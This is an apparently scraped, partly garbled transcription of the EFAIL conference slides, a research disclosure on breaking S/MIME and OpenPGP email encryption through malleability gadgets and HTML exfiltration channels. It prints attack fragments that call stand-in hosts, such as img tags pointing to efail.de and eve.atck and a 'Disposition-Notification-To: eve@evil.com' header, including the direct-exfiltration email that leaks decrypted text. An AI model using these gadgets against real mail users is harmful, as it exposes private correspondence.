EFAIL: Breaking S/MIME And OpenPGP Email Encryption Using .
2y ago
75 Views
1 Downloads
2.42 MB
58 Pages
Report/dmca
Download PDF

Transcription

EFAIL: Breaking S/MIME and OpenPGP EmailEncryption using Exfiltration ChristianJensFabianSebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk21 MünsterUniversity of Applied SciencesUniversity Bochum3 KU Leuven2 Ruhr

EFAIL Very important attack Because it has a logo Novel attack techniques targetingMIME, S/MIME and E-2018-8305CVE-2018-12372CVE-2018-123732

cker ModelMalleability GadgetsAttacking S/MIMEAttacking OpenPGPDirect Exfiltration

History of secure email4

Two competing standardsOpenPGP (RFC 4880) Favored by privacy advocates Web-of-trust (no authorities)S/MIME (RFC 5751) Favored by organizations Multi-root trust-hierarchies5

Motivation for using end-to-end encryptionNation state attackers Massive collection of Emails Snowden’s global surveillance disclosureBreach of email provider Single point of failure Aren’t they reading/analyzing my emails anyway?Insecure Transport TLS might be used – we don’t know!Compromise of email account Phishing Bad passwords6

History of secure email7

Both standards use old cryptoVulnerable to padding oracle attacksCiphertext C Enc(M)C1valid/invalidC2valid/invalidM Dec(C) (repeated several times)8

Old crypto has no negative impactCBC / CFB modes of operation used, but their usage is not exploitableAssumption:No backchannel is given9

cker ModelMalleability GadgetsAttacking S/MIMEAttacking OpenPGPDirect Exfiltration

Backchannel techniquesForcing a mail client to phone home HTML/CSS JavaScript Email header Attachment preview Certificate verification img src "http://efail.de" object data "ftp://efail.de" style @import '//efail.de' /style .11

Backchannel techniquesForcing a mail client to phone home HTML/CSS JavaScript Email header Attachment preview Certificate verificationXSS cheat sheets12

Backchannel techniquesForcing a mail client to phone home HTML/CSS JavaScript Email header Attachment preview Certificate verificationDisposition-Notification-To: eve@evil.comRemote-Attachment-URL: http://efail.deX-Image-URL: http://efail.de 13

Backchannel techniquesForcing a mail client to phone home HTML/CSS JavaScript Email header Attachment preview Certificate verificationPDF, SVG, VCards, etc.14

Backchannel techniquesForcing a mail client to phone home HTML/CSS JavaScript Email header Attachment preview Certificate verificationOCSP, CRL, intermediate certs15

Evaluation of backchannels in email clientsWindowsLinuxmacOSiOSAndroidWebmailWebappask userOutlookIBM NotesPostboxFoxmailLive uttApple MailAirmailMailMateMail AppCanaryMailOutlookK-9 dRoundcubeHorde IMPRainLoopAfterLogicleak by defaultGMXHushMailExchangeMailpileThe Bat!MulberryeM astMailProtonMailMailfenceMailboxZoHo MailGroupWiseleak via bypassscript execution16

cker ModelMalleability GadgetsAttacking S/MIMEAttacking OpenPGPDirect Exfiltration

Attacker model18

Attacker model19

cker ModelMalleability GadgetsAttacking S/MIMEAttacking OpenPGPDirect Exfiltration

Hybrid encryption Choose message 𝑚 Generate session key 𝑠 Encrypt message 𝑚 with session key 𝑠 𝑐 𝐴𝐸𝑆𝑠 (𝑚) Encrypt session key 𝑠 with public key𝑝𝑢𝑏 of recipient 𝑘 𝑅𝑆𝐴𝑝𝑢𝑏 (𝑠) Send the encrypted session key andthe encrypted message to the recipientContent-type: app/encrypted𝒌𝑠Dear Alice,cthank you for your email.The meeting tomorrowwill be at 9 o‘clock.21

Hybrid encryption Obtain the encrypted email Extract ciphertext 𝑘 and ciphertext 𝑐 Decrypt 𝑘 with private key 𝑠𝑒𝑐 toobtain session key 𝑠 𝑠 𝑅𝑆𝐴𝑠𝑒𝑐 (𝑘) Decrypt ciphertext 𝑐 with session key 𝑠to obtain the cleartext 𝑚 𝑚 𝐴𝐸𝑆𝑠 𝑐Content-type: app/encrypted𝒌𝑠Dear Alice,cthank you for your email.The meeting tomorrowwill be at 9 o‘clock.22

Malleability of CBC/CFB𝑠𝒄 23

Malleability of CBC/CFB𝑠Dear Alice,𝒄 ?ur efail.The meeting tomorrowwill be at 9 o‘clock.24

Hybrid malleability of CBC/CFGMessage Authentication Codes (MAC) Protection against ciphertext tampering Attacks against MAC-then-Encrypt (Vaudenay) Attacks against MAC-and-Encrypt (Paterson)25

S/MIME: Absence of authenticated encryptionS/MIME Structure26

Malleability of CBC/CFBC0C1C2decryptiondecryptionContent-type: text/html\nDear BobP0P127

Malleability of -type: text/html\nDear Bob011P0'P110111028

Malleability of CBC/CFBC0 P0CBC 000000xt/html\nDear BobP0'P129

Malleability of CBC/CFBC0 P0 PcC1C2decryptiondecryptionXORABQ000 img src ”ev.il/xt/html\nDear Bob011P0'P110111030

Malleability of CBC/CFBC0C1'C2decryptiondecryptionContent-type: teZt/html\nDear BobP0'P1'31

Malleability of CBC/CFBC0C1'C2decryptiondecryption?Zt/html\nDear BobP0'P1'32

cker ModelMalleability GadgetsAttacking S/MIMEAttacking OpenPGPDirect Exfiltration

Practical Attack against S/MIME34

Practical Attack against S/MIMEContent-type: text/html\nDear Sir or Madam, the seecret meeting wiOriginalCrafted? base"?" href "http:" ? img"?" src "efail.de/Content-type: text/html\nDear Sir or Madam, the se?" Changingecret meeting wiDuplicatingReordering35

Practical Attack against S/MIME

cker ModelMalleability GadgetsAttacking S/MIMEAttacking OpenPGPDirect Exfiltration

OpenPGP OpenPGP uses a variation of CFB-Mode PGP-Standard has integrity protection Compression is enabled by defaultCiencryptionCi 1encryptionCiXencryptionencryption? ? ? ? ? ? ? ?Pi (known)Pi-1Pc (chosen)random plaintext38

OpenPGP – Integrity Protection Integrity Protection is performed by adding an MDC at the end of thepacketTAG 18 LENGTHTAG 8LENGTHTAG 11 LENGTHContent-Type:multipart/mixed; boundary “ TAG 19 LENGTHefa3e9ca54f0879c5b187636c23b7de376a5ba41 encrypted compressed Tag Type of PGP packet8 CD: Compressed Data Packet9 SE: Symmetrically Encrypted Packet11 LD: Literal Data Packet18 SEIP: Symmetrically Encrypted and IntegrityProtected Packet19 MDC: Modification Detection Code Packet39

RFC4880 on Modification Detection Codes

OpenPGP – Integrity ProtectionDefeating Integrity ProtectionClientPlugin (up to version) MDC StrippedOutlook 2007GPG4WIN 3.0.0Outlook 2010GPG4WINOutlook 2013GPG4WINOutlook 2016GPG4WINThunderbirdEnigmail 1.9.9Apple Mail (OSX)GPGTools 2018.01VulnerableMDC IncorrectSEIP - SENot Vulnerable41

OpenPGP – Compression PGP uses compression (DEFLATE) Makes our life much harder: we do notknow so many plaintext bytes We need to know at least 11 Bytes of theplaintext but only know 4 from the packetheadersContent-Type: multipart/mixed;boundary „BOUNDARY"--BOUNDARY GUESS 1 --BOUNDARY.--BOUNDARY GUESS N But: We can do multiple guesses per Mail--BOUNDARY-- Mostly between 500 to 1,000 „submails“ permail42

OpenPGP – Compression43

OpenPGP – CompressionContent-Type: multipart/alternative;boundary "b1 232f841e30b3b8112f31ed86c8cee5ab"--b1 232f841e30b3b8112f31ed86c8cee5abContent-Type: text/html; charset "UTF-8" html body p Hello XXX, /p p here is your code: 123456 /p imgsrc "https://www.facebook.com/email open log pic.php?mid TRACKING CODE HERE"/ /body /html --b1 232f841e30b3b8112f31ed86c8cee5ab--44

OpenPGP – CompressionFacebook Password Recovery Generated 100,000 Password Recovery Emails based on template Encrypted them with GnuPG in default configuration Estimated number of guesses based on variance in starting bytesContent-Type:multipart/mixed;boundary „BOUNDARY"--BOUNDARYA302789ced590b90.No.Starts with %Cumulated c14551a0.001100 211A302789ced590990.--BOUNDARY--45

OpenPGP – CompressionEnron Email Dataset Contains approx. 500,000 „real“ Emails1 Encrypted them with GnuPG in default configuration Estimated number of guesses based on variance in starting bytesNo.Starts with %Cumulated 9c4d90cb8ed340100.0340.99 5001https://www.cs.cmu.edu/ enron/46

47

Impact on the standardsS/MIME standard draft - draft-ietf-lamps-rfc5751-bis-11 References EFAIL paper Recommends the usage of authenticated encryption with AES-GCMOpenPGP standard draft - draft-ietf-openpgp-rfc4880bis-05 Deprecates Symmetrically Encrypted (SE) data packets Proposes AEAD protected data packets Implementations should not allow users to access erroneous data48

cker ModelMalleability GadgetsAttacking S/MIMEAttacking OpenPGPDirect Exfiltration

Direct exfiltration This attack is possible since 2003 in Thunderbird Independent of the applied encryption scheme Somewhat fixable in implementation But works directly in Apple Mail / Mail AppThunderbirdPostbox The standards do not give any definition for that!50

Direct exfiltrationAlice’s mail programencrypts the emailEncrypting-----BEGIN PGP VVZ1uvk3wieArHUg -----END PGP MESSAGE-----Alice writes a Mail to BobFrom: AliceTo:BobDear Bob,the meeting tomorrow will beat 9 o‘clock.51

Direct exfiltrationAlice’s mail programencrypts the emailEncryptingAlice writes a Mail to BobFrom: AliceTo:Bob-----BEGIN PGP MESSAGE----Dear Bob,hQIMA1n/0nhVYSIBARAAiIsX1QsHthe meeting tomorrow will beZObL2LopVexVVZ1uvk3wieArHUg at 9 o‘clock.-----END PGP MESSAGE-----52

Direct exfiltrationEve capturesencryptedmodifies the emailandmailand Bobsendsbetweenit to BobAliceor AliceOriginal E-MailEve’s attack E-MailFrom: EveTo:BobContent-Type: text/html img src "http://eve.atck/From: AliceTo:Bob-----BEGIN PGP VVZ1uvk3wieArHUg -----END PGP MESSAGE-----Content-Type: text/html" 53

Direct exfiltrationBob’s mail program puts thecleartextthebackinto the bodydecryptsemailDecryptingDear Bob,the meeting tomorrow will beat 9 o‘clock.Eve’s attack E-MailFrom: EveTo:BobContent-Type: text/html img src "http://eve.atck/-----BEGIN PGP VVZ1uvk3wieArHUg -----END PGP MESSAGE-----Content-Type: text/html" 54

Direct exfiltrationEve’s attack E-MailFrom: EveTo:BobContent-Type: text/html img src "http://eve.atck/src "http://eve.atck/DearBob,the meeting tomorrow will beat 9 o‘clock.“ EveGET l%20be%20at%209%20o%E2%80%98clock.Content-Type: text/html" 55

Direct exfiltration – Demo Time

Conclusions New attacks exploiting functionalitiesbetween crypto / non-crypto standards Countermeasures hard to apply: S/MIME is broken OpenPGP needs revisions Recommendations: Short term: disable HTML Mid term: patch the clients Long term: new standards57

Black Hat sound bytes Crypto standards need to evolve We knew that CBC is dangerous since how long? Crypto is useless without Authenticated EncryptionThank you!Questions? HTML email is bad Writing privacy preserving email clients is hard Securely embedding PGP and S/MIME is hard But: EFAIL does not rely on HTML Engineering lesson Cryptosystems contain multiple components All of them may look sane’ for themselves When combined, things can easily breakwww.efail.de58

EFAIL: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels Damian Poddebniak 1, Christian Dresen1, Jens Müller2, Fabian Ising , Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2 1 Münster University of Applied Sciences 2 Ruhr University Bochum 3

Related Books

DRAGON: Breaking GPU Memory Capacity Limits with Direct .

DRAGON: Breaking GPU Memory Capacity Limits with Direct .

Hypertrophy Workout Cycle - Breaking Muscle

Hypertrophy Workout Cycle - Breaking Muscle

CIMdata cPDm Late-Breaking News

CIMdata cPDm Late-Breaking News

Smokefree and Tobacco-Free U.S. and Tribal Colleges and .

Smokefree and Tobacco-Free U.S. and Tribal Colleges and .

Covid-19 and the Irish Hospitality Sector: Impact and Options

Covid-19 and the Irish Hospitality Sector: Impact and Options

Security and SAP Fiori: Tips and Tricks as You Move from .

Security and SAP Fiori: Tips and Tricks as You Move from .

SAP List of Prices and Conditions SAP Software and Support .

SAP List of Prices and Conditions SAP Software and Support .

Atlas - Multiple Category Scope and Sequence: Scope and .

Atlas - Multiple Category Scope and Sequence: Scope and .

COVID-19 and the Workplace: Implications, Issues, and .

COVID-19 and the Workplace: Implications, Issues, and .

TRAINING AND MOTIVATION: KEY TO A QUALITY AND

TRAINING AND MOTIVATION: KEY TO A QUALITY AND

Power and consumer behavior: How power shapes who and

Power and consumer behavior: How power shapes who and

Guidelines and Best Practices for the Installation and .

Guidelines and Best Practices for the Installation and .

PopularTags

Recent Views